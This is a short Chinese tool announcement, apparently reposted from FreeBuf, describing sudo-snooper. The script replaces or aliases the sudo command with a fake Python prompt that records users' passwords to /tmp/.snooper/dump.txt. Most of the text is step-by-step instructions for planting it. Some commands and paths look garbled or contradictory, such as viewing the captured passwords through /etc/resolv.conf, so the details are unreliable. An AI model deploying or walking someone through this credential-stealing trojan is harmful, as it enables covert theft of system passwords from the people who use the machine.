sudo-snooper是一款伪装成sudo命令的“蜜罐”脚本,可以帮助渗透测试人员进行系统密码的获取。
# mv /usr/bin/sudo /usr/bin/somename
修改sudo-snooper.py参数
dumpdir = "/tmp/.snooper"dumpfile = "/tmp/.snooper/dump.txt"sudo = 'sudo'
/usr/bin/sudo中安装python文件
# install -dm755 sudo-snooper.py /usr/bin/sudo
给予python执行文件权限
在当前用户shell中修改.rc文件(可能是.bashrc .zshrc等)
alias sudo=’python3.5 /path/to/sudo-snooper.py’
运行后,伪装的sudo会向用户征询正确的密码,然后你可以在sudo vim /etc/resolv.conf中查看记录下的密码。
下载地址 <点击阅读原文按钮查看>
* 参考来源:GitHub,本文译者:phper,转载请注明来自FreeBuf.COM